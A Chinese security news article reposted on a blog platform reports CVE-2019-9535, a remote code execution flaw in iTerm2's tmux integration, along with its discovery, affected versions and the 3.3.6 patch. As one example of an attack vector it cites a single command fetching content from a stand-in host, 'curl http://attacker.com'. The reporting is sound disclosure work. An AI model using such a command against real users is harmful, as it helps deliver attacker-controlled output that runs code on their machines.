前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Mac终端利器 iTerm2被曝严重的RCE漏洞,至少已存在7年(含PoC视频)

Mac终端利器 iTerm2被曝严重的RCE漏洞,至少已存在7年(含PoC视频)

作者头像
FB客服
发布2019-10-15 16:50:58
7500
发布2019-10-15 16:50:58
举报
文章被收录于专栏:FreeBufFreeBufFreeBuf

由Mozilla开源支持计划(MOSS)资助、网络安全公司Radically Open Security(ROS)开展的一次独立安全审计结果显示,iTerm 2 中存在一个严重的远程代码执行(RCE)漏洞,且至少已存在7年。

iTerm 2 简介

iTerm2是全球最热门的终端模拟器之一,是开发人员经常使用的MacOS 终端工具,是Mac内置终端app最有力的热门开源工具替代品之一,被很多开发人员称为“Mac 终端利器”。

MOSS 计划选择iTerm2进行安全审计的原因在于它处理不受信任的数据且其使用范围广泛,用户包括高风险目标如开发人员和系统管理员。

漏洞概述

该漏洞的CVE编号是CVE-2019-9535。

在审计过程中,ROS在iTerm2的tmux集成功能中找到了一个至少已存在7年之久的严重漏洞。攻击者如能生成终端输出,则在很多情况下能够在用户计算机上执行命令。这种攻击向量的例子是连接到由攻击者控制的 SSH 服务器或者命令如curl http://attacker.com and tail -f /var/log/apache2/referer_log。

开发人员George Nachman指出,“审计发现某个问题在收到一定的输入后会导致iTerm2发出命令。这个问题非常严重,因为在某些情况下,当用户查看文件或者接收在iTerm2构造的输入时,攻击者就能够在用户机器上执行代码。”

Nachman认为该漏洞影响的iTerm2用户数量介于10万至20万之间。

Mozilla公司的安全工程师Tom Ritter指出,这个漏洞源自iTerm2中的 tmux集成功能。Tumx应用程序是一款终端多路复用器,可允许从单个设备创建并控制多个终端。

CERT协调中心发布漏洞通知表示,可通过使用命令行工具在终端屏幕上打印由攻击者控制的内容,从而利用该漏洞。该中心指出,“潜在的攻击向量包括通过ssh连接至恶意服务器,通过curl 获取恶意网站,或者通过tail –f跟踪包含某些恶意内容的日志文件。”

如下是模拟受害者机器连接到恶意SSH服务器之后,在机器上执行命令的 PoC视频。在这个案例中,只打开一个计算器作为其它更具恶意的命令的占位符。

一般情况下,该漏洞需要某些用户交互或伎俩才能遭触发,但由于它可通过通常被认为是安全的命令利用,因此它的潜在影响力巨大。

影响版本

该漏洞影响于本周早些时候发布的 3.3.5 版本及之前版本。

修复方案

目前补丁已发布但自动更新尚未推送,建议用户立即在iTerm2目录中选择“检查新版本”手动更新至最新版本3.3.6。

*参考来源:Mozilla、TheRegister,由代码卫士编译,转载请注明来自FreeBuf.COM

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-10-10,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • iTerm 2 简介
  • 漏洞概述
  • 影响版本
  • 修复方案
相关产品与服务
命令行工具
腾讯云命令行工具 TCCLI 是管理腾讯云资源的统一工具。使用腾讯云命令行工具,您可以快速调用腾讯云 API 来管理您的腾讯云资源。此外,您还可以基于腾讯云的命令行工具来做自动化和脚本处理,以更多样的方式进行组合和重用。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档